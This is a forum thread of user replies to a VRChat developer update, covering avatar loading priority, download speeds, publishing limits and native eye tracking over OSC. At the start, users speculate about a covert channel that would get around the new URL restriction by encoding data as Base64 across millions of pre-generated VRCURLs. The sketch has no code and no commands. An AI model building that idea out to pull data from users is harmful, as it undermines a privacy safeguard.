Developer Update - 2 March 2023

I am still intrigued to see how this security measure will work in the long run. I fully anticipate that someone will come up with some sort of data requesting scheme that could just barely exfiltrate data in an effective way.

For example, having an API endpoint that can take any string as a path, and then generating all the possible strings locally as VRCURLs, encoded in something like Base64. Being able to map tons of binary data into text strings.

Even just 128 ASCII characters (in a URL) could encode to 1024 binary digits. So even if the data isn’t necessarily identifying or sensitive, it could still be a LOT of data.

“1024 bits” is the street term for that.

Because you’ve mentioned base 64, I’m going to go with 24 bits of information, there is 16 million different value for 24 bits of information, so you’d need an array of 16 million vrcurl entries. With base64 you’d use four characters to represent three bytes of information.

I wonder how big of an array can be handled at the moment. ToS friendly idea for this: A remote color picker. Let the user specify rbg value and pass to a script that returns a swatch, or a tinted picture. It’s a silly idea, but good way to test 16 million vrc urls.

1 Like

So if I want to load friends first regardless of where they are, I can turn off near distance and leave only prioritization by friends, right?
In most of my use cases I need friends already loaded when I get close to them, so I usually wait at the entrance for a bit to give them time to load. Because when I approach they might start reacting by waving or giving me headpats. I want to start interacting with them instantly instead of awkwardly explaining that they’re still loading for me and I can’t see what they’re doing.

Yep! That’ll work too. Switch off distance and on friends, your friends will load first in size order, followed by everyone else in size order.
Generally though if you’re on a decent connection and in an indoor scene, the 20 meter radius followed by finding them will have them load in before you reach them - since they’re higher priority at that point, they’ll begin the moment they’re in range.

My connection is okay, but the download speed from the vrchat’s content servers is very unstable. On a good day it could be 10 megabytes per second, but occasionally it can slow down to something like 0.5 megabyte per second (or even less). I think I’ve seen other people reporting it as a “slow download speed bug”.

OMG EYE TRACKING!!! YEAAAAAAAH!!! :smiley:

1 Like

Hey I was planning to publish an avatar for a friend, he setup a world and I wanted to contribute.
Apparently I can’t publish any avatars because I need to spend more time in VRChat, despite me being on for 2 years.

Got anything written under bio? If it’s empty set it to “i like swords” or something

Eye tracking is gonna be only standalone quest feature again(like with hand tracking)?
htc and pico also have open sdk for eye tracking and that’s tiresome to make avatar setups for that every time.

Don’t forget about the OSC support for eye tracking.

So instead of separate program set custom avatar values, the authors of those programs will be able to update to set official VRChat avatar values.

Ahoy! That’s an amazing feature I’ve been waiting for but, what about facial tracker and Pimax’s eye tracking module? How will things be for those? Because for now eye trscking with pimax x vrchat is honestly awful to set up and it barely works, in addition of not having same parameters that are known (according to the way I set it up).
And on the way, should add the camera path aka key frame or idk if you see what I mean. This is amazing for videos and more!

We won’t be supporting face tracking just yet.

Notably, the difference in standards between most eye-tracking solutions is why we are not supporting each one natively. There is no agreed standard, and we do not want to implement and maintain every single variant of each company’s standard-- so we left an interface open that allows full control over eye-look via OSC.

As docteh pointed out, there is no need for you to set up eye tracking parameters as long as you input the proper data into the OSC endpoints, and you have eye-look set up through the default avatar descriptor.

1 Like

It’s make easier setup for new avatars (or editing existing) or it allows via controlling those parameter on OSC get eye tracking on existing avatars with ‘fake looking’ setup?

All Avatars which have “Eye Look” setup should just work. It even respects the limits you have set for it! Though the current blinking system only provides a way to blink with both eyes, but as mentioned in the Dev Update an SDK update will allow for having a blink blend shape per eye.

1 Like

I’m not quite able to follow your post (sorry!) but as DrBlackRat and the OP notes, if you have the built-in VRChat simulated eye movement set up, then the native eye tracking will work. All you have to do is use Quest Pro in standalone mode, or send OSC data to the defined endpoints.

2 Likes

This topic was automatically closed after 7 days. New replies are no longer allowed.